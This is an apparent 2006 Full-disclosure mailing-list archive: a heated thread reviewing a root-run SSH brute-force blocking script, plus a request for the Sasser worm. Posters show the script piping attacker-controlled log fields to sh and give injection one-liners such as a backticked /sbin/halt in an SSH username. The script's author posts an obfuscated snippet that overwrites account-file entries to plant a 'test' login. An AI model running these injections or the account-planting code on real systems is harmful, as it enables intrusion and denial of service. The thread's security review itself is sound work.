name,
 but you can bet your ass that every time we have an infection in one of
our
 schools from now until the stars burn out; that I'll be making a point
of
 asking who the computer teachers are in that building.

 You want to teach these kids a lesson? Write it on the blackboard.

 We have enough work to do just keeping up with the kids, without an
alleged
 professional turning loose a worm in our network.


 =
 I'm a high school network administration teacher
 looking for a creative means of teaching my students
 the importance of patch management.  I was hoping to
 let a particularly nasty worm loose on a closed lab
 so my students could see what happens during an outbreak,
 but I'm running into a hitch - I can't find a worm that
 would spread quickly enough to be useful.

 Does anyone have a copy of Sasser or a similar worm
 that they would be willing to send or link me to?
 Please contact me off-list.  I would be happy to
 verify my identity as a high school teacher off-list
 as I'm sure that is a concern for most anyone who has
 what I am looking for.

 Please do not reply on list as I am not currently a member.
 Thank you,
 Chris
 

 




Re: [Full-disclosure] The state of JavaScript Hacking

2006-11-27 Thread Martin Johns
So what you are trying to say is that JavaScript is bad, because it
nowadays runs on more than one platform? Or did I miss something?
Since when has the choice of programming language made any difference?

Best,
Martin

-- 
Martin Johns
http://www.martinjohns.com



[Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo
For those interested, I wrote a program called Sharpener which is an SSH 
brute force blocking tool that also reports back the offenders' 
addresses. I have begun posting the information on the attackers as well 
as sending out messages (whenever possible) to the admins of these 
domains. Think of it as an RBL for SSH attackers. The goal is to 
identify these machines in order for others to implement safeguards 
(ACL's) against these hosts. Feel free to comment/complain.



http://www.infiltrated.net/sharpener (tool)
http://www.infiltrated.net/bruteforcers (offenders)

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread K F (lists)
a douchebag?

I dunno but why the hell aren't your boxes patched to Sasser yet?

-KF


deep fried wrote:
 What am I
  
 Consultant?
 School Teacher?
 Terrorist?
  
  


  


Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)

2006-11-27 Thread Lyal Collins
Over 8 years old (mid 1997/8) -
http://www.dotsec.com/onBank.html?topic=302544

Lyal

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Debasis
Mohanty
Sent: Tuesday, 28 November 2006 6:12 PM
To: 'Gadi Evron'; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Defeating Image-Based Virtual
Keyboards and Phishing Banks (fwd)


More than a year Old (3rd August, 2005) - 

Defeating CITI-BANK Virtual Keyboard Protection
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html

http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip

http://xforce.iss.net/xforce/xfdb/21727


Regards,
-d




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
 For those interested, I wrote a program called Sharpener which is an SSH 
 brute force blocking tool that also reports back the offenders' 
 addresses. I have begun posting the information on the attackers as well 
 as sending out messages (whenever possible) to the admins of these 
 domains. Think of it as an RBL for SSH attackers. The goal is to 
 identify these machines in order for others to implement safeguards 
 (ACL's) against these hosts. Feel free to comment/complain.
 
 
 http://www.infiltrated.net/sharpener (tool)
 http://www.infiltrated.net/bruteforcers (offenders)


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

-- 
-
[EMAIL PROTECTED] | finger me for my pgp key.
---



Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Valdis . Kletnieks
On Mon, 27 Nov 2006 13:36:39 EST, K F (lists) said:
 Dude... settle the hell down.
 
 I see little problem with this guy doing this on a closed LAN in a lab 
 setting. What part of CLOSED LAB did you miss? Its not like he is 
 intentionally letting it loose on the entire school LAN.

You would have us believe that the guy is clued enough to run a closed
lab without screwing up (and there's *lots* of ways to screw up, starting
with forgetting to wipe the drives afterwards, forgetting to disable a
wireless card, forgetting to not plug any of the boxes into the normal net,
forgetting to...).

And yet he's not clued enough to know how to find a copy of Sasser by himself.

There are a lot of people who are of the opinion that if you have to ask
where to find a copy of Sasser, you're not clued enough to be trusted with
a copy.



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

  


Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)


if [ `whoami` != root ]

   then  echo "This script needs to run under the root user"
exit

else

if [ -e /tmp/hosts.deny ]

   then
rm /tmp/hosts.deny
fi
/

Check to see if the user is root. If not, tell the user Hey dumbass, you
need to be root, if the user is root, continue.

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and find the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in 
/etc/hosts.deny

into /etc/hosts.deny

/
OS=$( uname|sed -n '1p')
/

This is a no brainer. No voodoo there.

# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'`


Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 
192.168, print
the second field, and replace the term addr: with nothing. No voodoo 
here jackass.


/
function IPT {

awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\

awk '/iptables/ && !/#/ && !/-s  -i/'|sh

}
/

This is such a hacker thing coming now. You caught me.

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk 
hacking)


/
if [ "$OS" = "Linux" ]

   then
   IPT

fi
/

This is where I guess I hack the world. Check the OS and if it's Linux, 
then


cat /etc/hosts.deny

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk 
hacking)
then print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 
22 -j REJECT

$1 = IP address
$ifaddr = IP address of the interface

/
echo "Copying sharpener to /usr/local/bin"
sed -n '1,67p' ./sharpener > /usr/local/bin/sharpener
echo "fi" >> /usr/local/bin/sharpener
rm ./sharpener
/

Here goes the voodoo... You ready?

print lines from 1 through 67 of this same file but put it in 
/usr/local/sharpener

add a fi to that same file then remove the original

/
sleep 2
echo ""
echo "Adding Sharpener to cron"
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener"

if [ -e /var/spool/cron/root ]

   then
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/spool/cron/root


else
if [ -e /var/cron/tabs/root ]

   then
   echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/cron/tabs/root


   fi
fi

/

Add it to cron


/

awk '!/192.168/ &&
!/127./ &&
!/#/ &&
!/172.32/{print $1" has been blocked via SSH"}' /etc/hosts.deny |\

mail -s "Sharpener" [EMAIL PROTECTED]

fi
/

Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, 
and ignore 172.32
then mail it to an evil hacker site so they can traverse telekinetically 
into your machine.


Right.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
 Tavis Ormandy wrote:
 
 Nice work, really subtle rootkit. I like the email phone-home.
 
 Here's an exploit.
 
 #!/bin/sh
 ssh 'foo bar `/sbin/halt`'@victim
 
   
 
 Since you seem to be clueless I'll answer step by step. Here goes idiot. 
 (Sinful to see someone so clueless coming from Gentoo... Guess it goes 
 with the romper room Linux territory)
 /
 awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny

insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh "error retrieving"@localhost && ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.

-- 
-
[EMAIL PROTECTED] | finger me for my pgp key.
---



Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Peter Dawson

On 11/27/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:


And yet he's not clued enough to know how to find a copy of Sasser by
himself.

There are a lot of people who are of the opinion that if you have to ask
where to find a copy of Sasser, you're not clued enough to be trusted with
a copy.





yeah I agree, whoever posted/ started this original thread was on gmail and

is not clued in enough to take a quick left glance at the adsense frame
and s/eh will get tonnes of bait from google :)-



go figure..

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
 Since you seem to be clueless I'll answer step by step. Here goes idiot. 
 (Sinful to see someone so clueless coming from Gentoo... Guess it goes 
 with the romper room Linux territory)

Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

 /
 awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
 diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny
 /
 
 There is no hocus pocus here. Look at /var/log/secure and fine the term
 error retrieving and print the next line, 13th column. Then sort it and
 print the unique entries into /tmp/hosts.deny. After you do this, compare
 /tmp/hosts.deny with /etc/hosts.deny and put the differences not in 
 /etc/hosts.deny
 into /etc/hosts.deny

What will be in column 13 when Tavis does this:

 Tavis Ormandy wrote:
 Here's an exploit.
 
 #!/bin/sh
 ssh 'foo bar `/sbin/halt`'@victim

Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.

-- 
gabriel rosenkoetter
[EMAIL PROTECTED]



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


So again dumbass...

Look at the script. Although YOU'RE opening /var/log/authlog what is the 
script opening. Please tell me you're really not that stupid. And if 
someone else decided to modify this script, what does that have to do 
with what I posted. How exactly is my script a backdoor as you claim. 
Enquiring minds want to know this since you claim it's a backdoor. Please 
tell me outside of your modification how this is going to backdoor someone.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:


Jesus christ people get stupider by the moment. W/e the script is there 
for scrutiny there is no hidden voodoo. If you DO want to see hidden 
voodoo here it is,,,



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)



Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

There is no hocus pocus here. Look at /var/log/secure and find the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny into /etc/hosts.deny



What will be in column 13 when Tavis does this:

Tavis Ormandy wrote:

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.


Here is your voodoo backdoor moron

file=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F : 
'BEGIN{OFS=:}{$1=test}1{$2=\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1}2' 
 $file

file2=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/'  $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'`
$what|$who full-disclosure@lists.grok.org.uk


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Brian Eaton

On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:


There is no hocus pocus here. Look at /var/log/secure and find the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny into /etc/hosts.deny



Parsing malicious input with shell commands is like disarming land mines
with a hammer.

And doing it as root?  That's like disarming land mines with a hammer while
you're stark naked.

Regards,
Brian

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 03:59:37PM -0500, gabriel rosenkoetter wrote:
 Uh... actually, no. The provided exploit will work, and you're the
 idiot.

Begging your pardon, you are saved by single-quoting your awk(1)
statement:

  awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru > /tmp/hosts.deny
[...]
 What will be in column 13 when Tavis does this:
 
  Tavis Ormandy wrote:
  ssh 'foo bar `/sbin/halt`'@victim
[...]
 Why, the shelled-out output of `/sbin/halt`!

Nope, I'm wrong, just the literal string `/sbin/halt`, which you
never exec.

Mea culpa. Tavis's exploit doesn't do scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.

On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote:
 Look at the script. Although YOU'RE opening /var/log/authlog what is the 
 script opening. Please tell me you're really not that stupid.

Actually, your BSD version DOES open /var/log/authlog (which will
fail on FreeBSD, btw, where it's /var/log/auth.log), so you should
probably stop casting stones and quit while you're ahead with my
explanation above of why Tavis's exploit is a non-starter.

But since we're on the topic... wouldn't it be a better plan to
check the local syslog.conf for the location of the auth failure
log messages rather than hard code it?

-- 
gabriel rosenkoetter
[EMAIL PROTECTED]



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote:
 So again dumbass...
 
 Look at the script. Although YOU'RE opening /var/log/authlog what is the 
 script opening. 

I'm opening authlog as I don't use secure, the same thing applies.

 Please tell me you're really not that stupid. And if 
 someone else decided to modify this script, what does that have to do 
 with what I posted. How exactly is my script a backdoor as you claim. 

It's a backdoor because your script doesn't account for out-of-order log
entries, usernames or other data containing spaces thus making your
field count incorrect, or other daemons using the string `error
retrieving` in their log entries.

The insecure temporary file creation allows a local user to add entries
to the passwd file (for example), or create or modify any file as root.
Although it doesn't directly allow them to control the data the file is
created with, combined with the other flaw this is possible. Even
without the other flaw, the existence of some files is a problem, such
as /etc/.nologin.

the test -e and rm is insufficient, firstly as it's a race condition,
and secondly as test -e will return 1 on broken (sometimes called
dangling) symlinks.

 Enquiring minds want to know this since you claim its a backdoor. Please 
 tell me outside of your modification how this is going to backdoor someone.

I'm not sure what you mean by modification, I simply substituted the name
for the logfile I use.

Thanks, Tavis.

-- 
-
[EMAIL PROTECTED] | finger me for my pgp key.
---


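Tavis's `test -e` point above, as an added demonstration in Python (this is not code from the thread; the file names are constructed under a throwaway directory): an exists-style check follows a planted symlink, finds no target and reports "absent", so the plain write that follows creates whatever the link points at, whereas an exclusive create (`O_CREAT|O_EXCL`, plus `O_NOFOLLOW`) or `mkstemp` refuses the planted name in the same system call that would have created the file.

```python
import errno
import os
import shutil
import stat
import tempfile


def create_exclusive(path: str) -> int:
    """Create and open `path` only if nothing is there yet, in one system call.

    O_EXCL makes open() fail with EEXIST when the name already exists, and
    POSIX requires that failure even when the name is a symlink whose target
    is missing; O_NOFOLLOW (where the platform has it) refuses to follow a
    symlink at all. There is no window between a `test -e` and the write
    for someone to plant a link in.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags, 0o600)


def compare_checks(tmpdir: str) -> dict:
    """Plant a dangling symlink under `tmpdir` (a constructed scenario) and
    record what each approach does with it."""
    link = os.path.join(tmpdir, "hosts.deny")        # the fixed, predictable name
    target = os.path.join(tmpdir, "does-not-exist")  # where the planted link points
    os.symlink(target, link)

    result = {
        # `test -e` follows the link, finds no target and reports "absent",
        # so a script that guards its write with it carries on.
        "test_e_sees_link": os.path.exists(link),
        # An lstat-based check (`test -L`) does see the link itself.
        "test_L_sees_link": os.path.lexists(link),
    }

    # Exclusive create: refused, because the name is already taken.
    try:
        os.close(create_exclusive(link))
        result["exclusive_create_refused"] = False
    except OSError as exc:
        result["exclusive_create_refused"] = exc.errno in (errno.EEXIST, errno.ELOOP)

    # What the thread's script does once `test -e` says "absent": the plain
    # write follows the link and creates the *target*, wherever it points.
    with open(link, "w") as fh:
        fh.write("sshd: 192.0.2.10\n")  # constructed deny entry
    result["naive_write_created_target"] = os.path.isfile(target)

    # The proper scratch file: unpredictable name, created exclusively, 0600.
    fd, tmp_path = tempfile.mkstemp(dir=tmpdir)
    result["mkstemp_gave_regular_file"] = (
        stat.S_ISREG(os.fstat(fd).st_mode) and not os.path.islink(tmp_path)
    )
    os.close(fd)
    return result


def run_comparison() -> dict:
    """Run compare_checks() in a throwaway directory and always clean up."""
    tmpdir = tempfile.mkdtemp()
    try:
        return compare_checks(tmpdir)
    finally:
        shutil.rmtree(tmpdir)


if __name__ == "__main__":
    for name, value in run_comparison().items():
        print(f"{name}: {value}")
```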

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


I'm not sure what you mean by modification, I simply substituted the name
for the logfile I use.

Thanks, Tavis.

So for the third time now. Explain to me how I am backdooring someone's 
system.


[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' 
/var/log/secure|sort -ru

222.171.20.252
211.137.74.58

My logs parse out addresses, not names, and there is no redirection going 
on. If you want to say "Hey... It should be written as such" then gladly 
do so. But posting "hey you're backdooring the planet" like a jackass is 
moronic. Line by line on my machines it does what it needs to do and it 
does so just fine. Did you see any notes of Gentoo on the comments? I 
didn't because I don't use it, never have, don't care to. So if it does 
something different on Gentoo, let's use the brain for a moment... "Gee 
this works horrible on Gentoo. The author is a shitty writer... I think 
I should let him know" as opposed to "Oh my gawd he's backdooring you."



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams






Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
 Mea culpa. Tavis's exploit doesn't so scary things, although he's
 right you should really be doing a bit more sanitization of (evil)
 user-supplied input, given that you're (insisting that you) run as
 root.

Gabriel, I was referring to this line:

awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh

(note the |sh), $1 can be controlled by specially crafted attempted
logins.

Thanks, Tavis.

-- 
-
[EMAIL PROTECTED] | finger me for my pgp key.
---



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 09:29:33PM +, Tavis Ormandy wrote:
 Gabriel, I was referring to this line:
 
 awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
 awk '/iptables/ && !/#/ && !/-s  -i/'|sh
 
 (note the |sh), $1 can be controlled by specially crafted attempted
 logins.

Aha.

Yep, sure can!

I couldn't find where the malicious input was actually executed, but
I didn't spend long looking.

I take back my take back.

-- 
gabriel rosenkoetter
[EMAIL PROTECTED]



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Michael Holstein
why not save all that trouble and just use the --limit directive in 
iptables? (examples on the netfilter mailing-list).

~Mike.



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
 Tavis Ormandy wrote:
 
 I'm not sure what you mean by modification, I simply substituted the name
 for the logfile I use.
 
 Thanks, Tavis.
 
 So for the third time now. Explain to me how I am backdooring someone's 
 system.

J, Please calm down. You have made a programming error in your script
that attempts to eliminate the minor `log noise` from incorrect ssh
logins with a script that can be subverted to execute arbitrary shell
commands.


 
 [EMAIL PROTECTED] include]# uname -a
 Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 
 i686 i386 GNU/Linux
 [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' 
 /var/log/secure|sort -ru
 222.171.20.252
 211.137.74.58
 
 My logs parse out addresses not named and there is no redirection going 
 on.

Yes, but you assume a fixed format of the log entries. This is not the
case. The string "error retrieving" is easily placed in the log by
setting it as your username and attempting to login. You also assume
that the multiple log entries generated by a failed login are logged
atomically (ie, no other log entries will appear between these two
entries), this is also not the case.

 If you want to say Hey... It should be written as such then gladly 
 do so. But posting hey you're backdooring the planet like a jackass is 
 moronic.

J, you asked people to install your security tool which contacts you
with enough information to find out who installed it and where, and
contains several rather obvious security flaws. If I mistook stupidity
for malice, I apologise.

 Line by line on my machines it does what it needs to do and it 
 does so just fine.

This is because your logs don't contain any entries specially crafted by
an attacker to subvert your machine. I'm sure some members of the list
are already attempting this on your web server, so you can check your
logs for examples.

 Did you see any notes of Gentoo on the comments? I
 didn't because I don't use it, never have, don't care to. So if it does 
 something different on Gentoo, let's use the brain for a moment... Gee 
 this works horrible on Gentoo. The author is a shitty writer... I think 
 I should let him know as opposed to Oh my gawd he's backdooring you.

It's a standard format J, my log entries look identical to yours. It has
nothing to do with Gentoo.

Thanks, Tavis.

-- 
-
[EMAIL PROTECTED] | finger me for my pgp key.
---



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread gabriel rosenkoetter
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
 So for the third time now. Explain to me how I am backdooring someone's 
 system.
 
 [EMAIL PROTECTED] include]# uname -a
 Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 
 i686 i386 GNU/Linux
 [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' 
 /var/log/secure|sort -ru
 222.171.20.252
 211.137.74.58
 
 My logs parse out addresses not named and there is no redirection going 
 on. If you want to say Hey... It should be written as such then gladly 
 do so.

You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
characters to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.

I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.

I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.

-- 
gabriel rosenkoetter
[EMAIL PROTECTED]



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:

On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:

Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.



Gabriel, I was referring to this line:

awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh

(note the |sh), $1 can be controlled by specially crafted attempted
logins.

Thanks, Tavis.



That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you suppose it would be possible for someone to insert "0wn3ed" or any 
other variable outside of an IP address?


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Michael Holstein
 That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
 you suppose it would be possible for someone to insert "0wn3ed" or any 
 other variable outside of an IP address?

Remember the (in)famous quote "...that vulnerability is purely 
theoretical..."?

I think the point is you don't use $language to split a bunch of fields, 
and then pipe them back through /bin/sh without making sure they're not 
malicious.

Doesn't matter that you can't think of a way to make them malicious .. 
somebody else will find one. It's safer to just assume it'll happen and 
always sanitize variables before you {do_stuff;} with them.

(my $0.02)

~Mike.



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.

No it can't. Even if it was "rm -rf" someone placed in, did you not notice 
my grep statement? Only print items with a decimal. At no given point 
anywhere on the 13th column, whether it's Solaris, NetBSD, FreeBSD, would 
there be an option for someone to craft anything...


FreeBSD
-bash2-2.05b$ uname -a
FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: 
Thu May 11 01:34:54 CDT 2006 
[EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS  i386

-bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru
57354
57340
57335
56253
55125
49211
40334
37188
3508
33875
33635
33454
32798
3137
2895
2638
2408
2301
2114
-

OpenBSD
# uname -a
OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386
# awk '{print $13}' /var/log/authlog|grep \.|sort -ru
63.243.158.221
61.129.85.230
220.132.113.163
219.149.211.49
213.195.75.41
206.210.96.56


I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.

This should have been stated to the list as opposed to "You're 
backdooring people"



I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.

I'll give you addresses if you'd like to take a shot at it.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you suppose it would be possible for someone to insert "0wn3ed" or any 
other variable outside of an IP address?



That's impossible.

Putting extra spaces in the log entry is easy.

And extra spaces would do what... If the point is to insert a name 
someone in order to send out information from the 13th column in 
authlog, then I'll tell you what, you name the system it can happen on 
and I will personally apologize publicly. It is not doable. I'd have a 
better chance of hanging with Santa while I bang Angelina Jolie while 
Denise Richards watches me.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Michael Holstein wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you suppose it would be possible for someone to insert "0wn3ed" or any 
other variable outside of an IP address?



Remember the (in)famous quote "...that vulnerability is purely 
theoretical..."?


I think the point is you don't use $language to split a bunch of fields, 
and then pipe them back through /bin/sh without making sure they're not 
malicious.


Doesn't matter that you can't think of a way to make them malicious .. 
somebody else will find one. It's safer to just assume it'll happen and 
always sanitize variables before you {do_stuff;} with them.


(my $0.02)

~Mike.

So I ask you too... Find me any Unix derivative that will allow someone 
to pass a name, word, place, etc into the 13th column of authlog, then 
bypass grep which is grep'ing out for decimals.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams




